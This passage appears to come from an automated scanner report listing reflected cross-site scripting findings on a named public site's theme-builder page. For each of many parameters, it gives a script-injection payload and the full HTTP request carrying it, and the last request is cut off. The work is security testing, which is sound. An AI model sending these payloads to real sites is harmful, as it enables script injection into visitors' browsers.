HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c359"><script>alert(1)</script>80c2b6e1d8d was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px2c359"><script>alert(1)</script>80c2b6e1d8d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114c1"><script>alert(1)</script>04551e80a06 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121114c1"><script>alert(1)</script>04551e80a06&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b8b6"><script>alert(1)</script>24d17bc86e5 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff3b8b6"><script>alert(1)</script>24d17bc86e5&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216dc"><script>alert(1)</script>01abf8a1ade was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F216dc"><script>alert(1)</script>01abf8a1ade&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff7d"><script>alert(1)</script>b0f69a04f14 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaff7d"><script>alert(1)</script>b0f69a04f14&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df80"><script>alert(1)</script>970c39be0f5 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff8df80"><script>alert(1)</script>970c39be0f5&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f43"><script>alert(1)</script>25c4f2d24a5 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=36363611f43"><script>alert(1)</script>25c4f2d24a5&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbdcb"><script>alert(1)</script>a7634bd91cf was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121cbdcb"><script>alert(1)</script>a7634bd91cf&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e42b"><script>alert(1)</script>4fcb9c8818e was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif1e42b"><script>alert(1)</script>4fcb9c8818e&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb184"><script>alert(1)</script>2227218b9c2 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1embb184"><script>alert(1)</script>2227218b9c2&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6902"><script>alert(1)</script>ca9b0958104 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalf6902"><script>alert(1)</script>ca9b0958104&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120030
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1117f"><script>alert(1)</script>1dd019a3a40 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=4545451117f"><script>alert(1)</script>1dd019a3a40&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6491"><script>alert(1)</script>f0203e10f2c was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222b6491"><script>alert(1)</script>f0203e10f2c&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftS